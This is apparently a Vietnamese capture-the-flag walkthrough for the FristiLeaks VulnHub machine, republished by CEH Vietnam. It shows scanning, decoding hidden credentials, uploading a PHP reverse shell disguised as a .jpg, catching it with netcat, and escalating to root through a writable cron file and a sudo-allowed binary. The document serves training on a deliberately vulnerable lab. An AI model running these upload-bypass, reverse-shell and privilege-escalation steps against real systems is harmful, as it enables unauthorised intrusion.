CEHack Fristileaks VM (Thử thách CTF)

Xin chào, chúng ta sẽ cehack Fristileaks VM. Chúng ta không biết gì về máy ảo này ngoại trừ thực tế là mức độ bảo mật là từ sơ cấp đến trung cấp. Ngoài ra, máy ảo này chỉ hoạt động trên địa chỉ MAC 08:00:27:A5:A6:76 nếu không nó sẽ không hoạt động.

Bạn có thể tải xuống từ đây: https://www.vulnhub.com/entry/fristileaks-13,133/

Nhiệm vụ: Nhận quyền truy cập root và Chụp cờ

Trình độ: Trung cấp

Penetrating Methodology

  • Scanning Network
  • Enumeration
  • Exploiting Web Application
  • Post Exploit Enumeration
  • Privilege Escalation
  • Capture the Flag

CEHacking

Quét mạng …….. (mod 3 CEH v12)

Hãy bắt đầu bằng cách quét IP mục tiêu của bạn.

nmap -A 19.168.1.110

Nmap cho chúng ta thấy cổng số 80 đang mở. Do đó, hãy mở IP của nạn nhân trong trình duyệt.

Enum (mod 4 CEH v12)

Và ta đã tìm thấy cổng đăng nhập thông qua fristi. Khi tôi xem trang nguồn của thư mục này, tôi thấy thứ mà tôi nghĩ là tên người dùng.

Ngoài ra, bằng cách đọc siêu dữ liệu của hình ảnh đã được mã hóa như được chỉ ra trong nguồn trang, tôi đã tìm thấy một chuỗi ký tự. Để giải mã hãy chạy lệnh như sau:

base64 -d encode > 1.png

Khai thác ứng dụng web (mod 13 CEH v12)

Tiếp theo, tạo một shell php_reverse (có sẵn bên trong thư mục: /usr/share/webshells/php), ở dạng .jpg và các giá trị lhost và lport đã sửa đổi.

… sau đó tải lên shell này trong 192.168.1.110/frsti/do_upload.php.

Và thực thi shell của mình bằng cách gõ:

192.168.1.110/fristi/uploads/shell/php.jpg

… thông qua netcat, ta sẽ lắng nghe và nhận phiên trong khi điều hướng :

nc -lvp 1234
cd /home
ls
cd eezpeez
ls -la

Post Exploit Enumeration

Như vậy, trong thư mục /eezpeez, ta tìm thấy tệp note.txt. Hãy đọc nó:

cat notes.txt

Một lần nữa trong note.txt, có một tin nhắn từ Jerry cho ta biết phải làm gì. Vì vậy, hãy làm theo các bước bằng cách gõ:

echo "/home/admin/chmod –R 777 /home/admin"> /tmp/runthis

Sau khi gõ lệnh, quay trở lại thư mục chính và từ đó đi vào thư mục quản trị viên.

cd /tmp
cd /home/admin
ls -la

Bây giờ, như trong hình trên, bạn có thể thấy rằng mã cho phép chuỗi được mã hóa, hãy lưu tập lệnh trong kali của bạn và sau đó thay đổi từ ‘base64string’ thành ‘decoded’ trong tập lệnh và cuối cùng sử dụng lệnh sau để giải mã nó:

python cryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG

Và chuỗi được giải mã là ‘LetThereBeFristi!’

Nâng cấp đặc quyền

Đây có thể là mật khẩu của người dùng fristigod. Vì vậy, hãy thử và sử dụng . Đối với điều này, chúng ta cần chuyển đổi người dùng, vì vậy hãy gõ lệnh sau:

su fristigod

Vì vậy, hãy kiểm tra sudo ngay để lệnh đã nói hoạt động. Do đó gõ:

sudo -l
cd /var/fristigod
ls -lsa
cat bash.history

sudo -l

Hệ thống sẽ yêu cầu nhập mật khẩu cho fristigod, sử dụng mật khẩu tương tự như trên.

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
id
cd /root
ls
cat fristileafs_secrets.txt

Sau đó, bằng cách điều hướng xung quanh bằng các lệnh trên, tôi tìm thấy một tệp văn bản. Hãy đọc nội dung của tệp, là flag 2.

Chúc mừng Pentester !!

Tác giả : Yashika Dhir

CEH VIETNAM Tổng Hợp & Biên Soạn


Trả lời

Bạn cần phải đăng nhập để gửi bình luận:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s

%d người thích bài này: